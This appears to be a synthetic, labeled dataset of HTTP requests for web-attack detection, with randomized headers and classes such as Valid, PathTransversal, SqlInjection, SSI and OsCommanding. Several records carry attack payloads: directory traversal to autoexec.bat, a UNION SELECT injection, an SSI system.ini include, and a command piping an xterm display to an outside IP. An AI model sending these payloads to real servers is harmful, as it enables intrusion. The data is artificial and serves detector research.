If-Range: *
Max-Forwards: 1
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="REsn"
Authorization: Digest algorithm=MD5-sess
Range: -216
Referer: /1f7ot.php3
TE: chunked
Trailer: Accept-Language
User-Agent: 6crwsepas (541HGBAo2K; i81kAqg; eZOu@LmT; l2SsZj)
UA-CPU: Sparc
UA-Disp: 512,7635,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 290x591
Via: icv/7.7 190.61.29.93, HTTP/8.7 8.138.127.117, 1.4 www.mt3e.jpeg
Transfer-Encoding: deflate
Upgrade: t7rs/3.9, wsOC/1.9, elcLbb/7.5, yutxee/3.6, sz6enA/6.2
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 855751913795
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1317
Start - Id: 36046
class: PathTransversal
GET /rQdad0Eaf8rjisgnto/Dechoa8KmUKsVb.bin?qB46niiRtn=ftctbenmh&imgrnevalpi=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&sOesittlynbi=0r8&dndsas=79318&drwRsdtjhrh=lbsiJd2Ka HTTP/1.0
Host: www.Dlamairm.net
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: iso-8859-1, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 140.87.76.152
Cookie: gtdoEo=7KBxF;Cha4r4xojRe8dsr=101392;ND4formh-Ls2telnet=b hobexect?0certotsB;titlAsjhirun=pfL1xetaieee8a8Xd;eettp=61921
Cookie2: $Version="69"
Date: Sat, 14 Jul 07 18:43:48 UTC
ETag: W/".l1xi4XzvcD1Rn.Isdt"
Expect: 100-continue
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Mon, 17 Aug 09 12:59:29 CET
If-Unmodified-Since: Tue, 29 Aug 06 24:10:42 CET
If-Match: "cpJg7Avs94O@02kroeWj"
If-None-Match: "G9IaU4.Ie-nYJpc"
If-Range: "C7VLLCUl8Gc4SXt5"
Max-Forwards: 8540
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest cnonce="cK41eie"
Range: 709-485
Referer: /6rtufo/daeni/lPgeao.sh
TE: trailers
Trailer: If-Match
User-Agent: weoceusie (azCUXJi)
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 5.8 www.z8hmu.jpg, uie0ru/3.3 www.ixct1es.tiff, 6.4 www.tedtxer.jpeg
Transfer-Encoding: gzip
Upgrade: oeii/7.9, Txls/7.6, uci2it/8.1
Warning: 503 230.183.212.133 "reoem7gfiotv8mdeeL0V" "Sat, 30 Jan 10 17:01:26 CET"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36046
Start - Id: 33468
class: Valid
POST /LvarBcOimg3cE_uv75/wStchthDvsts/rmoyeaaddnZe/eOrsegt/zkGY8rHj0w/oeS.asmx? HTTP/1.0
Content-Length: 239
Content-Language: oro,esohii5
Content-Encoding: identity
Content-Location: /edryc7f/ulcyhr/fews/xog5eT.php
Content-MD5: aTM4T3NpM2VvcGVUdEVnYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Mar 07 08:38:10 GMT
Last-Modified: Sun, 14 Jun 09 22:42:10 UTC
Host: 13.152.17.3:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-2;q=0.2, hz-gb-2312;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: g='almsenrt'
Client-ip: 88.3.221.168
Cookie: l1mteecczb=O-d;i4usni=801294483;YDUO=jvIe~dot>hLm7we;Gcn=75250493
Cookie2: $Version="953"
Date: Sun, 01 Oct 06 08:11:14 GMT
ETag: W/"lG75uwrLcxruS67"
Expect: sabIt=etatnae;Aeesoun=3lr2Eo
From: arra@bopdn.biz
If-Modified-Since: Wed, 12 Aug 09 01:40:07 CET
If-Unmodified-Since: Thu, 05 Aug 04 17:37:10 GMT
If-Match: *
If-None-Match: "lDlHfp2B8d5.MQKHi9u"
If-Range: Tue, 25 Mar 08 14:19:20 GMT
Max-Forwards: 4364
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM bnNvdXMyZTZucm9kZzJuZTR3RUhvaXNhbmpuY3Nuc28ybWxlbw==
Authorization: aiwms tymTl=uteo
Range: 408-106,8887-956063
Referer: http://www.9hdzj.de/4O0eD/ww02e2/sEieRdm.asp
TE: trailers,gzip;q=0.4,chunked
Trailer: Authorization
User-Agent: nseeabb
UA-CPU: Sparc
UA-Disp: 0089,4532,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4154x581
Via: nbnaie/7.1 www.lf9cse.htm
Transfer-Encoding: deflate
Upgrade: tbkjy/9.3, M3wzc8/5.0, too/6.5
Warning: 657 165.58.231.168 "oeofT8kteyMTk0" 
X-Forwarded-For: 24.33.216.151
X-Serial-Number: 944908095975390
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hBp=lcopygdivnaknn\<br&rvccdzme=4108251&tr0trcGdels=yR\nr&ei=giFrE&HtniiEiysnnwv=&haeem7odq r8Recinn&TfuOfTy=sk02KFu&ctMeiafo=35198&ucerajNeetvrs=e_2umdOu3D0V&rfenlvmSOd6t=cDISeo&oOYrddeb2ul=29982&cxMHevalexecWBT8=48811&hNt2e=zn&

End - Id: 33468
Start - Id: 259
class: Valid
GET /iLiwHf/t0.swf?Asssanowuxsscns=aosi%26ftpolaor%3Ceuetnah5&oqdm6nTehi=7r%3Cha%409-ecueC%25oouS&75=iw_1dQFrR&dV67@=ueah7e&3snyvtzI3ilI0rn=idy8a&ifmii=8ffExGkN3&Bndaps=o-swWnbKm0F&elw=ae4hno&6eM5maAc9wlm2or=uHthAiase&5pbOn=40&9zncaac6plgrdu=%3A2teouhLm%3Ftun&etedaakaeh=5323949&e7btaq=th HTTP/1.0
Host: 215.126.47.226
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, iso-2022-jp, x-mac-arabic;q=0.8, iso-8859-2;q=0.0
Accept-Encoding: deflate, compress, compress, compress;q=0.2, compress
Accept-Language: *
Cache-Control: min-fresh=35
Client-ip: 237.190.39.41
Cookie: EeZypiaud=af)if2%php58boot.inih;t;4@1Kp_3R4.I=adz]qR
Cookie2: $Version="96"
Date: Sun, 21 Dec 08 06:45:09 CET
ETag: W/"8ngAg-0J-BQAxHJ"
Expect: tpitsuee=kaEHtmts
From: bfsu@ii7mg.cz
If-Modified-Since: Mon, 27 Oct 08 22:35:58 UTC
If-Unmodified-Since: Tue, 22 Dec 09 15:12:03 GMT
If-Match: "W9Fuoy4ki9uEdROlG0-"
If-None-Match: *
If-Range: Sun, 21 Jun 09 14:46:29 UTC
Max-Forwards: 372
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: nnedm sagh=xef1hdc
Authorization: snedE tns9eNs=seod
Range: -735916,3400-462,6-4322
Referer: /diynsr/r1ls6qca/webkl/gqj2/txkri.mpeg
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: Mozilla/2.7 (Windows; U; Windows NT 3.9; h7-sA; rv:7.6.4) Gecko/25841837
UA-CPU: Sparc
UA-Disp: 223,1661,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4622x2387
Via: FTP/9.7 www.rodk.shtml
Transfer-Encoding: gzip
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 778 228.207.156.98 "emdbsg0nhaeda1q" "Thu, 02 Sep 04 15:14:39 UTC"
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 388092866322
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 259
Start - Id: 24753
class: Valid
GET /eeayisnhlsVetunpe/jR9VMHzY@htpassfnodes/ei9IElninsrl0jaoe8/e7KPHysamenbl8agF/9q/eet/lotFvkdUe/lptw60fhdu.php? HTTP/1.1
Host: 116.230.229.187
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 113.251.255.211
Cookie: FDWdiv6@G=6n
Cookie2: $Version="7"
Date: Fri, 02 May 08 24:19:18 CET
ETag: "bOpVt.thji.0i07rBE"
Expect: 100-continue
From: 4Pioe@levcc.org
If-Modified-Since: Tue, 26 Apr 05 12:30:15 GMT
If-Unmodified-Since: Sat, 10 Mar 07 21:28:14 CET
If-Match: *
If-None-Match: "zcPvMtSw2-ZzPch5WmLR"
If-Range: *
Max-Forwards: 1
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic U2VlZXo3OmloZHBhbnM=
Authorization: efyat agdt=3snt
Range: -36328,9-116,9338-3
Referer: /nTses/sitodxx/ntnpfi.cgi
TE: trailers,deflate;q=0.0
Trailer: Upgrade
User-Agent: Mozilla/4.0 (X11; U; Open BSD i386 0.8; 04-De; rv:7.0.8) Gecko/24794947
UA-CPU: 68000
UA-Disp: 572,4672,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: voa4/2.9 223.116.169.132, 7.0 www.ap0eoas.css:945, erocer/7.7 66.62.198.213
Transfer-Encoding: deflate
Upgrade: nIi/7.5
Warning: 992 48.13.157.177 "n4nsphb" 
X-Forwarded-For: 109.34.199.216
X-Serial-Number: 05073071780221168240
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24753
Start - Id: 42274
class: SqlInjection
GET /1TBi8jg2LD.pl?inwanuta=90016947&@GLsgUak=tAVyOr%40ZX1&hBPoP.f.Y5=50108&kisnLtabyoc1=18941738&pejwindow.openmxOCautoexec9Y=B4arnsuti&5surnsa7hhaxene=tdrhr&nlkottLsDsemace=fbws_&resfw2tguywetue=13&Kreplace-R@8=w+68&soiSo=el%5Cpasswd&esG=%27UNIONALLSELECTfieldFROMlatonsWHERE%27%27+++%3D++%27&Fii=wu+1c&ea5usi=6593151 HTTP/1.0
Host: 178.25.129.23
Connection: close
Accept: text/plain, audio/*;q=0.4
Accept-Charset: isiri-3342;q=0.1, cp-950;q=0.3, cp-950;q=0.7, hz-gb-2312
Accept-Encoding: 
Accept-Language: eehe-5i3su, Irwb-Ytrto, oy8i-nInRip
Cache-Control: no-transform
Client-ip: 241.101.146.87
Cookie: ivofOLdlc=r>hiezppi:netcatohrh;in2ZhfB1=reCziuouhulOeun:;d2ejit7nbllsit=819024;ptdtamnsndrtew=32e;eboiikti=oht;exAuNtnt=812087510
Cookie2: $Version="520"
Date: Wed, 16 Aug 06 07:40:45 GMT
ETag: W/"5PHiq2QfXpycu@9_"
Expect: sRremose
From: eethwr@T5iivnsieh.be
If-Modified-Since: Mon, 20 Mar 06 09:22:27 CET
If-Unmodified-Since: Sun, 28 Mar 04 16:15:54 UTC
If-Match: "Y1ciMa1aAWoKgz3ETly6"
If-None-Match: ".Kh_UJzKedpLQeOa5dn7"
If-Range: Fri, 04 May 07 23:40:22 UTC
Max-Forwards: 7678
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: Digest username="jiE2t"
Range: -949568,-7
Referer: /j3rn/etec/ja5rl4/6lkaoa/taEhaon.jsp
TE: trailers
Trailer: Date
User-Agent: aaemh/5.9.6.2.3
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0775x379
Via: 5.7 www.leXagn.shtml, 5.1 www.rQ1pt.html
Transfer-Encoding: 3flnn; hs5rnegd=i5sia
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 301 34.243.209.148:30161 "olzejaFnho9ieieodT" "Fri, 02 Jan 09 11:48:48 CET"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42274
Start - Id: 40676
class: SSI
GET /olithRitwgEtt7dEil/b5gG/lR6t_giN3yWSD8/n0dkxeCRPC79MM21/x37u/t.Tqztwbhb0/ha/vizt1o5eghnI.sh?oehK=dgef3nk6bxyu&tDe=%3C%21--+++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&homTb5dashna=dx2ZppZJ7&@UcZ6KTAQ=ag&c50=390&shutdownRJaz=9&cnd6Xti2othtdi8=sdxudkeu&lraiRtbhe6oet=+fio&shfee=9aidf&asmht7tahsnhl=1834727294&nzLRpeiNG=%26ee&b2nm8=ee%28+dce+1tt1zs HTTP/1.0
Host: www.euorNore3s.net
Connection: ip0Irsp
Accept: audio/*, image/png
Accept-Charset: euc-cn;q=0.3, cp-932;q=0.4, iso-8859-1;q=0.4, x-mac-icelandic;q=0.4
Accept-Encoding: compress
Accept-Language: ens-9css, teC-0m, caa-Ennlspje, crata3p-eos5e
Cache-Control: no-store
Client-ip: 126.162.7.249
Cookie: dcnbSuaosnjttd=8;aatoeleq=hocn0U;aemy9maseak=sqm
Date: Sun, 13 May 07 19:31:46 CET
ETag: "zb.mz_qERALUPB_zKO"
Expect: 100-continue
If-Modified-Since: Tue, 13 Feb 07 21:11:53 CET
If-Unmodified-Since: Mon, 04 Apr 05 23:34:16 CET
If-Match: "99O..PUVgPiAO.3-gk4"
If-None-Match: *
If-Range: *
Max-Forwards: 1
Pragma: ooa='sRn'
Proxy-Authorization: Digest realm
Authorization: OioeVe ronfee=yoict
Range: -41940,-0
Referer: /ooa7j7a/ocGpon/se9Aoai/somnos.js
TE: chunked,chunked;q=0.3
User-Agent: GcbaseoE/3.6.4.9
UA-CPU: x86
Via: ECLr/1.2 86.155.153.37, 41o0t/0.8 76.95.201.117, 5.8 186.250.32.42
Transfer-Encoding: compress
X-Forwarded-For: 236.213.169.46
X-Serial-Number: 017478485639
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40676
Start - Id: 27257
class: Valid
GET /PdocumentvwgetWuemO-UoaZ/u8J/DOm/omis0h32e118fj/cGB-UgcZx@/P_2scripthwhereV/tmx/XbodyMxp_P/raes/idSmRtO.Cu7OkNpaRAJ/igseigv9to1ieUadj.nsf?aohmEte=staoTo%7EoptiyinputhomeEhhIeu&iyo36jPtyam=eiiuoluiouagrseces&tioD23i25Lo=Oeutl&LURNTIK=528&ssp=88436083&snia=inM6Ed&epeyR5Wrndyenn=24749 HTTP/1.1
Host: www.inwarte.net
Connection: close
Accept: */*
Accept-Charset: x-mac-ce;q=0.0
Accept-Encoding: 
Accept-Language: e-samA1eto, fsn-dSeocaeC;q=0.2
Cache-Control: max-age=641
Client-ip: 180.216.200.241
Cookie: ncbKLuiMservices=aGD;Izxarnnoa6n6uet=Euj;ay6n=g$9B;bog=Sh$gtu<>u0ewhere;eessamCr(
Cookie2: $Version="29"
Date: Wed, 20 May 09 13:42:06 CET
ETag: W/"6lB6Ey5_BVjt-eJ4ANhT"
Expect: pwheml=emo4nORl
From: rted@eseO4iri7.net
If-Modified-Since: Thu, 09 Sep 04 21:36:07 CET
If-Unmodified-Since: Thu, 20 May 04 12:18:04 GMT
If-Match: "6vfcp8dKybV0yzWi21"
If-None-Match: *
If-Range: Mon, 07 May 07 02:05:07 UTC
Max-Forwards: 3
MIME-Version: 6.6
Pragma: a3nli9='iddnwr'
Proxy-Authorization: Digest uri=http://www.yonersA.it/viliere/nase/ataasc/2ehf/a6te.js
Authorization: Basic aWFha2FpbjphSTFlb28=
Range: -7
Referer: /metdneb.cfm
TE: trailers,gzip;q=0.2,trailers
Trailer: If-Match
User-Agent: Mozilla/2.5 (Windows; U; Win 9x 4.9; 2o-6h; rv:2.6.0) Gecko/24493169
UA-CPU: 68000
UA-Disp: 4043,642,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8847x8709
Via: FTP/4.0 www.u4jteto.htm, 9.7 95.53.8.67
Transfer-Encoding: deflate
Upgrade: abeo/1.7, hNice/0.8, onao/1.2, i1n/2.5, rho/8.7
Warning: 401 www.sbfs.jpeg "cs4fiar" "Thu, 05 Jul 07 13:41:31 GMT"
X-Forwarded-For: 59.58.186.111
X-Serial-Number: 03585265611938930040
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 27257
Start - Id: 45201
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.0
Host: www.aoc3co.net
Connection: close
Accept: application/*, application/postscript;q=0.0, text/plain
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=52877
Client-ip: 200.164.50.206
Cookie: 90Ie=247467;rot8e=468;_jOfPQoptwV=18516;lHl1Ar7h=8602;4Sqonln=33615
Cookie2: $Version="5"
Date: Sat, 29 Dec 07 14:10:03 GMT
ETag: W/"5P7OUM98bOhr6Jn"
Expect: oq0ewer7
From: 6gdote@rgqihciehi.be
If-Modified-Since: Tue, 26 Oct 04 16:15:31 CET
If-Unmodified-Since: Sun, 22 Aug 04 24:26:00 CET
If-Match: "pYAuNA7QveRY2-iLSO"
If-None-Match: "U_hMFHAfVDHKKpWcec04"
If-Range: Sun, 15 Feb 09 18:41:00 CET
Max-Forwards: 9631
MIME-Version: 1.6
Pragma: xi8l='toq'
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: NTLM b3VlYW9ZbDN0QWFvdGNpN2RudGVzbm5laVdudWxFamVjb1JoeGVs
Range: 706278-,584316-,-67
Referer: /susoDO/hith/rhgu.conf
TE: gzip;q=0.1,chunked
Trailer: User-Agent
User-Agent: 1x9tyuetpdm7s8
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2083x0053
Via: 2.3 224.133.118.188
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 653 www.et0aI7.gif "huimuuaeets1Hsgeeh3t" 
X-Forwarded-For: 12.15.76.12
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45201
Start - Id: 351
class: Valid
GET /yd_7XG2BDEDx5w4n.t/Hdhttps-5N15SK3psdrop/hc8il2ei/e87_x9VN9RqS/edesfd7see.cfm?doiW5pvie=ea3b&tCcmGlimma7rc=632&pexec_inph-xi0G-=79597&alsa=o&qdiRfqt=Ncr%27%5C&eeqnfl=2774976&ruisofghvuwost=r&_xHwTuAoNJmJ=465&WZ-fbinEobl=4&hnokyf=o+rll%7Et&erok5I=79353055&B6ccUbKOGmailhM=e+eermWs6E&tUel0hooksget7=91434 HTTP/1.1
Host: 137.69.234.50
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-ce;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 192.168.223.13
Cookie: k7e2eaa3elnse=nNr;ras=i
Cookie2: $Version="29"
Date: Wed, 07 Dec 05 11:56:53 CET
ETag: "CV0COPDdiX@O0-_BLI"
Expect: 100-continue
From: fSh4c3s@1lere.gov
If-Modified-Since: Mon, 26 May 08 07:28:56 UTC
If-Unmodified-Since: Sat, 14 Feb 04 13:39:32 GMT
If-Match: *
If-None-Match: "6kNj6Nu.MkTSuhot"
If-Range: Sat, 01 Jan 05 17:11:18 UTC
Max-Forwards: 76
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic aDJ5bGE6Y2Rzb2M1emM=
Authorization: Digest nc=0ae8cffe
Range: -723325,-8,2410-
Referer: http://mcaeow.org/ocena/Nsdeglh.txt
TE: chunked;q=0.0
Trailer: Via
User-Agent: Mozilla/1.3 (X11; U; Open BSD i586 0.4; tn-we; rv:0.5.9) Gecko/37168655
UA-CPU: Sparc
UA-Disp: 6838,2277,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 170x4525
Via: FTP/8.7 213.228.156.180
Transfer-Encoding: t0hn; hshe=trRsl
Upgrade: nbdb/2.5, ows/3.4, aiNTa/6.6
Warning: 856 133.9.23.161 "adbfddinDnmgns" "Wed, 17 Feb 10 19:40:50 GMT"
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 21682850454988590168
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 351
Start - Id: 22709
class: Valid
GET /opiNoactNee/xa/get/ironitnstoo/d6nOkh-CZA/aY.gif?8resmstM3fuh5el=pm%40%7Cnaexterm&azAc7t=1153270&gdansrqbed=lycshsfqnn&vtgmhmcexhmool=%24ldo0e+ezdeletedeletelzininputi4c%5B&curiynyImehp=14005&utcqkaroral=Y%3B%5D&rf=hb&uozry=systemexecht&nrlaluascnalh=lIM2FAe3Y1xO&vjaUIrqrh3=s%40Biframefozcahwe&eso4pntinadeqdh=s1%5Cwo%3Carhnlogm0passwd6tnnu6&nlcstrh2htjNyN=6&aehgeb=%2Bdo1httaifa&cAtidiLpren=fqE9lArx9iecn&eT6MstdinSE6Ugroup byX3=sD32 HTTP/1.0
Host: 29.126.196.98
Connection: keep-alive
Accept: image/*;q=0.7, image/png, application/rtf;q=0.2
Accept-Charset: iso-8859-4;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 24.173.40.220
Cookie: sovO=40133321;rRtoyss=m?;opaegrm=netaolog e6inAri;ZMxupdatejsz=sArdC
Cookie2: $Version="4"
Date: Mon, 31 Oct 05 19:15:33 CET
ETag: W/"XUHbUD3CedbGOUJ@"
Expect: 100-continue
From: fwue@n7oczlrtbi.it
If-Modified-Since: Fri, 25 Sep 09 11:37:56 CET
If-Unmodified-Since: Mon, 24 Jul 06 06:20:21 CET
If-Match: *
If-None-Match: "QjBonRq3H10Zb6U"
If-Range: "Y8DIyk223FWkigoH"
Max-Forwards: 3
MIME-Version: 2.0
Pragma: jtA='iyLds4sa'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic bmNlYlRhaGE6aGlzZG5uTg==
Range: -0811
Referer: /Ad3tesia/9ihlzaE/ahntnsMd.tar
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.4 (Windows; U; Win98 8.3; Em-ho; rv:7.1.2) Gecko/46839618
UA-CPU: x86
UA-Disp: 949,175,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0084x738
Via: 9.9 252.92.232.150, 3.9 4.156.178.99:70139
Transfer-Encoding: deflate
Upgrade: npstdo/2.1, Bagih/0.7, ysdS/4.0, iMl/4.5
Warning: 287 114.101.191.4 "analt2uUr8sles" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 12701556330524195
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22709
Start - Id: 16883
class: Valid
GET /tqe8w.2/YTensNhei4nhN/er8UE.3z6KMWNQPX9/ptnldbnhi1oonau/rnHmG8iQf54b/nozt4ivqeatbn2cajss/krhn5opoyenslostser.cgi?amle8TiuntO=408728&doly4s=s&o99oMmid2=icscechoiowodqoeetelnet&mnAujopenmail=connectcd&tsutln=++&ifuagrtsdoe=ed1r&lcyOogmewoM=44270&l0mltaSs=oGR-&ocbqGet=eit&zyDzEchild=04Y3nZ.7.y_0&roeaamctlsoljbe=vddivftptf&FrJCfHLRGml=t6FYala%40TP&zhrItce3aoyekai=09&7sfrPR1DlogI7=70064&ey7obtqreees=hereshutdownb9seKo HTTP/1.1
Host: 121.219.94.216
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-hebrew;q=0.3, windows-1250;q=0.8, iso-8859-8-i
Accept-Encoding: compress, identity, identity;q=0.7
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 133.76.96.51
Cookie: 2FDaNydivxZH=191;h5wgetudrpD=eD7gN2evRmx5sleioh
Cookie2: $Version="535"
Date: Fri, 12 Sep 08 09:33:42 GMT
ETag: "upjskx3QOHaG7i2h"
Expect: rawdunO=nst6
From: eoZyce@peideie2b.cz
If-Modified-Since: Sat, 15 May 04 01:30:45 GMT
If-Unmodified-Since: Wed, 15 Mar 06 20:25:14 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Jul 07 16:22:54 UTC
Max-Forwards: 6839
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: NTLM SXFpcnRpb25yY2RmZ2gzaTFuZGtySWg3dHRkanNtZmh0MW10dGRs
Range: 431-,58-633271
Referer: http://www.RyHpNue3.org/aJsse0/nEarIe.cfm
TE: trailers
Trailer: User-Agent
User-Agent: om0qW0P29@ http://www.jaovpw.uk
UA-CPU: 68000
UA-Disp: 3594,2182,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 124x8989
Via: 2.7 www.isaB.jpeg
Transfer-Encoding: gzip
Upgrade: osu/3.4, lZote/5.0, bbZap/2.0, oA2/8.9
Warning: 024 248.14.211.213 "tommso7teoesEnlsd" 
X-Forwarded-For: 199.127.140.105
X-Serial-Number: 81135810517
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16883
Start - Id: 43002
class: OsCommanding
PUT /3uwtrraeieeli/eO3kjzAJ5pq9C1kthrB/i0qo8e/98v9Yn7FS4WG/n.pPg/uEz2/eAn/wKwsTb3SIemyUHn-eG.gif? HTTP/1.0
Content-Length: 328
Content-Language: lkeilm,iisranyN,a0Ifxr
Content-Encoding: gzip
Content-Location: http://www.6Moe.be/zizn2e/tna6/eetnlg/eS8po8n.msf
Content-MD5: T21lYWhzaWZlbmVlbnQ1RA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 11 Jun 09 02:19:25 UTC
Host: www.ttoortigbk.com
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: identity, compress, compress, deflate;q=0.3, deflate;q=0.3
Accept-Language: *;q=0.1
Cache-Control: min-fresh=15772
Client-ip: 110.134.30.79
Cookie: Fs2GxyQ=unionlrElSftp rpsi7between;bZEaWZe8log=esSMc/nyo
Cookie2: $Version="366"
Date: Wed, 11 Feb 09 03:55:06 UTC
ETag: W/"EOvZtIdss-Rbcsa0"
Expect: hnrn6=RjS6rhid
From: nerhOvTl@7taord7ae.gov
If-Modified-Since: Sat, 14 Jun 08 06:09:34 GMT
If-Unmodified-Since: Tue, 25 Sep 07 20:15:46 CET
If-Match: "t9nZfb@APRSvz@9MMmA"
If-None-Match: *
If-Range: Mon, 21 Aug 06 18:01:25 CET
Max-Forwards: 2490
Pragma: I=e9
Authorization: Digest username="alvtna"
Referer: /n5lrd/ssRNy/40njjblq/keee.gz
TE: deflate,deflate;q=0.1,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.9 (Machintosh; U; PPC 7.9; sn-3n; rv:2.1.5) Gecko/66113145
UA-Pixels: 2695x320
Via: 4.5 246.6.12.40:3130, FTP/6.4 55.45.174.120, FTP/0.5 www.o8nos.jpeg
Transfer-Encoding: 1dynle; ehrnen=xcniebg
Upgrade: aiuiar/7.4, iBr3df/9.5, iirowo/9.3
Warning: 863 www.t8fst5.js:4942 "iaa8uceowT1aeejsueoy" "Mon, 03 Nov 08 04:48:51 UTC"
X-Forwarded-For: 225.212.15.105
----: -----------------------

sroidt4=eQRsjR8zH&n12os0wwnNnh=owtbgsound&Esr6t=so OneaS&t0uTlntl=ea&_GsjvWupdatex=97&teuihgoaaebmele=|  /usr/openwin/bin/xterm+-display+137.244.83.244:0%00&ElS8rTenfnnce=ygos&CtGr=owexect7 tA&raebjlvrs=qcat6satdta @&V4r-RuiQ@Zj=rlt&uV0wX=4559204992&Iiframed-zHk4=re3eeL&wZuo=saS&vl1Erlrq=86250&diLlg=5689118

End - Id: 43002
Start - Id: 3246
class: Valid
GET /eMntfxhlcijrinkc8ee/l50elaahnm/mxH29P/evse0ieev4/Ti6e/swtivacadneo0/oInewdol/vKWxdvKBG-nO/unfteab1naoe/NwinntrSHwget7Wt2IQ/flGdUYL7P2lGMmd.tiff?DIopenA=+nSoo&xbtdrmen=ha3D.gG_9UK&etioaeag=7oe%24&osnE=8flpoJ0t54sh&henanaet=hvSB&witj76lfuwstdq=aomfpu5adel&taseznYrehe=ne++&Hif=s4rxcseab8trcprisi&Ig55=4124979&izum5n8=e9uE3 HTTP/1.1
Host: www.oyiU.ch:80
Connection: ecdRtdc
Accept: application/rtf
Accept-Charset: x-mac-roman, x-mac-korean;q=0.5
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 112.59.59.14
Cookie: OVq40lV77=winputpa ertd1Shhik;trSszonptntln8o=or
Cookie2: $Version="39"
Date: Mon, 18 May 09 16:31:19 UTC
ETag: "Mpe.8n2Qm9RRdSN"
Expect: 100-continue
From: enn6@rliEa.it
If-Modified-Since: Tue, 04 Sep 07 17:03:43 CET
If-Unmodified-Since: Thu, 18 Mar 10 04:47:04 UTC
If-Match: *
If-None-Match: "iEq.flR8iROa-Mt8pu"
If-Range: Mon, 10 Mar 08 11:26:13 UTC
Max-Forwards: 91
MIME-Version: 6.0
Pragma: hTha='ge'
Proxy-Authorization: mdtd4r Mierh=aeru9Ogt
